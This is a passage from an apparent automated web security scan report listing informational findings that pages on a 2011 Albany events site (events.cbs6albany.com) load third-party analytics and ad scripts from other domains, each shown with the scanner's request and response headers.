Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:33:49 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 1023
ETag: "a5d23d5c96a2955a67aa516e0e7f0125"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:33:49 GMT; HttpOnly
Content-Length: 39878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.153. http://events.cbs6albany.com/albany-ny/events/other

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/events/other

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-ny/events/other HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:35:46 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 756
ETag: "8b9b2fd68b63a7509906393f0d930234"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:35:46 GMT; HttpOnly
Content-Length: 29287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.154. http://events.cbs6albany.com/albany-ny/events/performing+arts

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/events/performing+arts

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-ny/events/performing+arts HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:34:11 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 668
ETag: "250131937c53fb4566c10898f7db4837"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:34:11 GMT; HttpOnly
Content-Length: 33524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.155. http://events.cbs6albany.com/albany-ny/events/shopping

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/events/shopping

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-ny/events/shopping HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:35:35 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 169
ETag: "8b0e18cd7f11736d5f2ce1267057f3c8"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:35:35 GMT; HttpOnly
Content-Length: 16991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.156. http://events.cbs6albany.com/albany-ny/events/show/139733045-pink-floyd-experience

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/events/show/139733045-pink-floyd-experience

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-ny/events/show/139733045-pink-floyd-experience HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:12 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 112
ETag: "7b0e2dfd3f73d429ae7ec8419c633199"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:12 GMT; HttpOnly
Content-Length: 59841

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.157. http://events.cbs6albany.com/albany-ny/events/show/142549185-lisa-lampanelli

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/events/show/142549185-lisa-lampanelli

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-ny/events/show/142549185-lisa-lampanelli HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:11 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 94
ETag: "f6e3ba32a247a1ced720795e12c14633"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:11 GMT; HttpOnly
Content-Length: 45711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.158. http://events.cbs6albany.com/albany-ny/events/show/147270025-glenn-beck

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/events/show/147270025-glenn-beck

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-ny/events/show/147270025-glenn-beck HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:12 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 111
ETag: "c997a76163320631f753f84f9de6ec37"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:12 GMT; HttpOnly
Content-Length: 59766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.159. http://events.cbs6albany.com/albany-ny/events/show/148455425-sesame-street-live-elmos-green-thumb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /albany-ny/events/show/148455425-sesame-street-live-elmos-green-thumb

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-ny/events/show/148455425-sesame-street-live-elmos-green-thumb HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
